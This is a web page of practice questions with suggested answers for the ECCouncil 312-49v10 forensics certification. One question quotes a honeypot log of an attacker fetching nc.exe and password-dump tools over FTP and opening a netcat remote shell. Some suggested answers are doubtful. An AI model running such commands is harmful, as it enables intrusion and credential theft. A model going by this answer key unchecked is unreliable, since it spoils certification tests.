ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 3

Question list
Search
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?

Question 21

Report
Export
Collapse

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A.
0
A.
0
Answers
B.
10
B.
10
Answers
C.
100
C.
100
Answers
D.
1
D.
1
Answers
Suggested answer: A

Question 22

Report
Export
Collapse

When examining the log files from a Windows IIS Web Server, how often is a new log file created?

A.
the same log is used at all times
A.
the same log is used at all times
Answers
B.
a new log file is created everyday
B.
a new log file is created everyday
Answers
C.
a new log file is created each week
C.
a new log file is created each week
Answers
D.
a new log is created each time the Web Server is started
D.
a new log is created each time the Web Server is started
Answers
Suggested answer: A

Question 23

Report
Export
Collapse

Which part of the Windows Registry contains the user's password file?

A.
HKEY_LOCAL_MACHINE
A.
HKEY_LOCAL_MACHINE
Answers
B.
HKEY_CURRENT_CONFIGURATION
B.
HKEY_CURRENT_CONFIGURATION
Answers
C.
HKEY_USER
C.
HKEY_USER
Answers
D.
HKEY_CURRENT_USER
D.
HKEY_CURRENT_USER
Answers
Suggested answer: A

Question 24

Report
Export
Collapse

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not affected by the magnet.

A.
logical
A.
logical
Answers
B.
anti-magnetic
B.
anti-magnetic
Answers
C.
magnetic
C.
magnetic
Answers
D.
optical
D.
optical
Answers
Suggested answer: D

Question 25

Report
Export
Collapse

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?

A.
Use a system that has a dynamic addressing on the network
A.
Use a system that has a dynamic addressing on the network
Answers
B.
Use a system that is not directly interacting with the router
B.
Use a system that is not directly interacting with the router
Answers
C.
Use it on a system in an external DMZ in front of the firewall
C.
Use it on a system in an external DMZ in front of the firewall
Answers
D.
It doesn't matter as all replies are faked
D.
It doesn't matter as all replies are faked
Answers
Suggested answer: D

Question 26

Report
Export
Collapse

What does the acronym POST mean as it relates to a PC?

A.
Primary Operations Short Test
A.
Primary Operations Short Test
Answers
B.
PowerOn Self Test
B.
PowerOn Self Test
Answers
C.
Pre Operational Situation Test
C.
Pre Operational Situation Test
Answers
D.
Primary Operating System Test
D.
Primary Operating System Test
Answers
Suggested answer: B

Question 27

Report
Export
Collapse

Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?

A.
bench warrant
A.
bench warrant
Answers
B.
wire tap
B.
wire tap
Answers
C.
subpoena
C.
subpoena
Answers
D.
search warrant
D.
search warrant
Answers
Suggested answer: D

Question 28

Report
Export
Collapse

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.

Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

A.
All forms should be placed in an approved secure container because they are now primary evidence in the case.
A.
All forms should be placed in an approved secure container because they are now primary evidence in the case.
Answers
B.
The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.
B.
The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.
Answers
C.
The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.
C.
The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.
Answers
D.
All forms should be placed in the report file because they are now primary evidence in the case.
D.
All forms should be placed in the report file because they are now primary evidence in the case.
Answers
Suggested answer: B

Question 29

Report
Export
Collapse

The MD5 program is used to:

A.
wipe magnetic media before recycling it
A.
wipe magnetic media before recycling it
Answers
B.
make directories on an evidence disk
B.
make directories on an evidence disk
Answers
C.
view graphics files on an evidence drive
C.
view graphics files on an evidence drive
Answers
D.
verify that a disk is not altered when you examine it
D.
verify that a disk is not altered when you examine it
Answers
Suggested answer: D

Question 30

Report
Export
Collapse

Which is a standard procedure to perform during all computer forensics investigations?

A.
with the hard drive removed from the suspect PC, check the date and time in the system's CMOS
A.
with the hard drive removed from the suspect PC, check the date and time in the system's CMOS
Answers
B.
with the hard drive in the suspect PC, check the date and time in the File Allocation Table
B.
with the hard drive in the suspect PC, check the date and time in the File Allocation Table
Answers
C.
with the hard drive removed from the suspect PC, check the date and time in the system's RAM
C.
with the hard drive removed from the suspect PC, check the date and time in the system's RAM
Answers
D.
with the hard drive in the suspect PC, check the date and time in the system's CMOS
D.
with the hard drive in the suspect PC, check the date and time in the system's CMOS
Answers
Suggested answer: A
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms